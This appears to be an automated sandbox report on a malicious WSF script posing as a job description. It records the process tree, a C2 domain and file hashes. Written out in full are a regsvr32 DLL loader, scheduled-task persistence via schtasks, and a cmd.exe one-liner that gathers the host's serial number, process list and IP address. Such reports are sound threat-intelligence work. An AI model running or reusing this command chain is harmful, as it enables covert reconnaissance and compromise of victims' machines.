- 488KiB (499415 bytes)
- Type
- script wsf
- Description
- HTML document, ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 556a1b6f7e124c0dbff6d0defa5c475f7854a2c0cae559ca1961c9ae4493e726
- MD5
- 9d73804b401a6eeacc1919ab1d0e6793
- SHA1
- a8fb72e2273f62e01e6cef92b96aa2b46a70dc23
- ssdeep
- 12288:f20Z90icm3lzwuNKpYXxWtT977GbqEtxs:Aic5AYWb4
Screenshots
Hybrid Analysis
Analysed 17 processes in total.
-
wscript.exe
"C:\JobDescription.wsf"
(PID: 3856)
- WINWORD.EXE "%APPDATA%\Microsoft\21152.doc" (PID: 3104)
-
regsvr32.exe
/s /i "%APPDATA%\Microsoft\40070.ocx"
(PID: 3904)
- schtasks.exe /Delete /F /TN "912F8A0F793" (PID: 2304)
- schtasks.exe /Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt" (PID: 1840)
-
msxsl.exe
8CDAF1CED822.txt 8CDAF1CED822.txt
(PID: 2028)
-
cmd.exe
/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"
(PID: 172)
- WMIC.exe wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist (PID: 3556)
- findstr.exe findstr /R /C:"SerialNumber=" (PID: 3184)
- WMIC.exe wmic csproduct get Name /FORMAT:Textvaluelist (PID: 3316)
- findstr.exe findstr /R /C:"Name=" (PID: 2788)
- tasklist.exe tasklist /FO CSV /NH (PID: 3588)
- WMIC.exe wmic os get ProductType /FORMAT:Textvaluelist (PID: 1140)
- findstr.exe findstr /R /C:"ProductType=" (PID: 1764)
- ipconfig.exe (PID: 712)
- findstr.exe findstr /R /C:"IPv4 Address" (PID: 3860)
- cmd.exe /c del "%APPDATA%\Microsoft\40070.ocx" >> NUL (PID: 1804)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
account.shopjobys.com | 18.222.173.108 (TTL: 599) | GoDaddy.com, LLC (Name Server: NS27.DOMAINCONTROL.COM; Creation Date: Wed, 09 Sep 2015 13:27:50 GMT) | United States |
crt.sectigo.com | 91.199.212.52 (TTL: 2412) | CSC CORPORATE DOMAINS, INC. (Organization: Sectigo Limited; Name Server: NS1.AS48447.NET; Creation Date: Thu, 16 Aug 2018 17:53:22 GMT) | United Kingdom |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
18.222.173.108 | 443 TCP | msxsl.exe PID: 2028 | United States |
91.199.212.52 | 80 TCP | msxsl.exe PID: 2028 | United Kingdom |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
91.199.212.52:80 (crt.sectigo.com) | GET | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt |

Raw request:
GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crt.sectigo.com
Extracted Strings
Extracted Files
Displaying 21 extracted file(s). The remaining 10 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
~_21152.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative Selection 11
-
-
21152.doc
- Size
- 64KiB (65536 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Internal Job Application Form, Author: gwen rogers, Template: Normal, Last Saved By: Pam Byrd, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Feb 24 18:58:00 2012, Create Time/Date: Tue Nov 3 20:35:00 2015, Last Saved Time/Date: Tue Nov 3 20:35:00 2015, Number of Pages: 1, Number of Words: 305, Number of Characters: 1744, Security: 0
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 16958cb1a72de96fe1bdd6dbb7898d2c
- SHA1
- efeb016d37a34c49cd899bdb9e67f1676f273019
- SHA256
- b98c89a2425b3b39478ca42cfa17b9ffc537ced9f69e5621b41db1694777e415
-
40070.ocx
- Size
- 298KiB (305264 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- regsvr32.exe (PID: 3904)
- MD5
- 48b127f32e5e41d02fe5bb577744c4c3
- SHA1
- 65b716bf242549dd81d8a4ef57c39b2bd6b52543
- SHA256
- 93dfe898ccbb8968a19dd0e1cab3b13750b833edfe2ec899ee53fa914480989d
-
77EC63BDA74BD0D0E0426DC8F8008506
- Size
- 57KiB (58806 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 58806 bytes, 1 file
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 5ad071a3917588e8cd883b123b395b21
- SHA1
- 4b688617093f21879354dd662a72266c35fd3cd2
- SHA256
- de62965c15528da598b0079d2d20d953dd6f71b13a23807bff0666d03f69c0fa
-
16406.txt
- Size
- 55B (55 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 4412bf97a7b19ead46af501f6d383417
- SHA1
- 28e492fc522064c6e556f2eb2314b1c0c32dee06
- SHA256
- 5ec7ed66dd49e1d070ceb2a88223143c606bce6df8292147173870132c8576d1
-
1931.txt
- Size
- 16B (16 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 9d21048d7cf74af78d568e0f66da8a6e
- SHA1
- 34cb2e67b1a4851653619925792a227ee2117e05
- SHA256
- 384bbf2518ca73c76e60a634dd15cb6350a8afdab40acc1ffce491c68b4175a1
-
23030.txt
- Size
- 18B (18 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 3745eb823ffc065e2ee1187d5168bd57
- SHA1
- 305b2cd1a7e453d0dda2839a88af9e549a88d4da
- SHA256
- ff97324b5c69e8f2e16c498918bf1c6196d530efc1fcff49293e5efcd4b89951
-
24760.txt
- Size
- 40B (40 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 082f2e97e670228e3b323c6a3a874f40
- SHA1
- e50760edb5e88385449a44818f5726e5beed7aab
- SHA256
- 292bf366a534157e5414f344218c9df828e2f211617fc84352f3ab2564050941
-
4254.txt
- Size
- 1.8KiB (1878 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 918d7ea3606de48b1e9770a3ab1935b1
- SHA1
- 3aa4593b121dad66d0e62de3f04a46ffb577e013
- SHA256
- dafb78a49f215525a9d842eec07932562dc7f13fb9c53028ad75e38df1ad44a1
-
55356.txt
- Size
- 39B (39 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 5effe6c8e5739655a16c39824a6f40a0
- SHA1
- 31e0b9cbee987659f4ac9708ab2853afd85024ed
- SHA256
- fcdfc4e0f1558bd2022f883cb3b7d50f0c17bf7f5784a8c78e27f5784fb6eb20
-
8785.txt
- Size
- 70B (70 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 360a2afd1f20a0e551c6e1513c93aa27
- SHA1
- 061cce9961562b7f1fffcaf2d36291a9b710cb25
- SHA256
- a7b296ba3f728546fb1527f31826098d81c7fbe1452a329ce1e6d98330f4f583
-
desktop.ini
- Size
- Unknown (0 bytes)
- Type
- empty
- Runtime Process
- msxsl.exe (PID: 2028)
-
-
Informative 9
-
-
21152.LNK
- Size
- 1.1KiB (1127 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 19 21:18:39 2019, mtime=Thu Dec 19 21:18:39 2019, atime=Thu Dec 19 21:18:39 2019, length=65536, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3104)
- MD5
- c68720b1488d132ba3f4de5d651ede0b
- SHA1
- 2a5c4cc15372c8baf6bd4a8c45499381d314466f
- SHA256
- e6a5e989e9437c9c58a658fd31745c422e57fae8e0b99f0fcc02e7b1dfc46676
-
index.dat
- Size
- 106B (106 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3104)
- MD5
- 228ec1b131a791e11c711303962054b2
- SHA1
- 6c72460b7a0a38b5dc029896c3e5217a1afbbcf7
- SHA256
- 8bac2c2bac5cf35659b38ba53d1191721605925f028c64a6be6751e2f4f09e1d
-
30D802E0E248FEE17AAF4A62594CC75A
- Size
- 1.5KiB (1559 bytes)
- Runtime Process
- msxsl.exe (PID: 2028)
- MD5
- adab5c4df031fb9299f71ada7e18f613
- SHA1
- 33e4e80807204c2b6182a3a14b591acd25b5f0db
- SHA256
- 7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676
-
57C8EDB95DF3F0AD4EE2DC2B8CFD4157
- Size
- 342B (342 bytes)
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 52abc6882a206f406d34c14804b42378
- SHA1
- b76b21a5cc2b8692fbde55ab08666f923fd544c3
- SHA256
- 55265411b6b71de9c78b705c7aef8d0c21c1b45f8f2390262a16fc0f02ae0cc9
-
5BBDA94EA59A54780CD5101BF0AF1837_75B55D50AC5471AEF49255E8D11DE15B
- Size
- 398B (398 bytes)
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 87dd162f591e0fc77f230b062aea92a6
- SHA1
- a7c8b525b0f9c59dc97c7b68a840e7d28a7f2f95
- SHA256
- baf4485d462ba4cf998e3aab7316d1be4b4a98e42600078b3ad8d4890726e551
-
07CEF2F654E3ED6050FFC9B6EB844250_426BFAC057FA3BC8F7120A426363018F
- Size
- 727B (727 bytes)
- Type
- data
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 8fc1af84c6d4786e084b4e07bfd9df3a
- SHA1
- 4955e76131ce512ad9264a00daf6f5bbb41c76b5
- SHA256
- b5714e8c3e4f5da8fc87e34257f04bba3f20b78dc05049cc3d594f8b4d0405fd
-
Cab4EC3.tmp
- Size
- 57KiB (58806 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 58806 bytes, 1 file
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 5ad071a3917588e8cd883b123b395b21
- SHA1
- 4b688617093f21879354dd662a72266c35fd3cd2
- SHA256
- de62965c15528da598b0079d2d20d953dd6f71b13a23807bff0666d03f69c0fa
-
Tar4EC4.tmp
- Size
- 142KiB (145767 bytes)
- Type
- data
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- fe89f18dcbc1bd6573e49a2221389694
- SHA1
- dd884349dd55c170460eb58fc8b2d7d0d3db1f20
- SHA256
- 6ff151546711862351137b646c09b5845979972079e68d00d0bc499540f58934
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
Notifications
-
Runtime
- Extracted file "21152.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/b98c89a2425b3b39478ca42cfa17b9ffc537ced9f69e5621b41db1694777e415/analysis/1576790625/")
- Not all file accesses are visible for WMIC.exe (PID: 1140)
- Not all file accesses are visible for WMIC.exe (PID: 3316)
- Not all file accesses are visible for WMIC.exe (PID: 3556)
- Not all file accesses are visible for cmd.exe (PID: 172)
- Not all file accesses are visible for cmd.exe (PID: 1804)
- Not all file accesses are visible for findstr.exe (PID: 1764)
- Not all file accesses are visible for findstr.exe (PID: 2788)
- Not all file accesses are visible for findstr.exe (PID: 3184)
- Not all file accesses are visible for findstr.exe (PID: 3860)
- Not all file accesses are visible for ipconfig.exe (PID: 712)
- Not all file accesses are visible for regsvr32.exe (PID: 3904)
- Not all file accesses are visible for schtasks.exe (PID: 1840)
- Not all file accesses are visible for schtasks.exe (PID: 2304)
- Not all file accesses are visible for tasklist.exe (PID: 3588)
- Not all sources for indicator ID "api-12" are available in the report
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "registry-1" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-25" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Not all sources for indicator ID "string-24" are available in the report
- Some low-level data is hidden, as this is only a slim report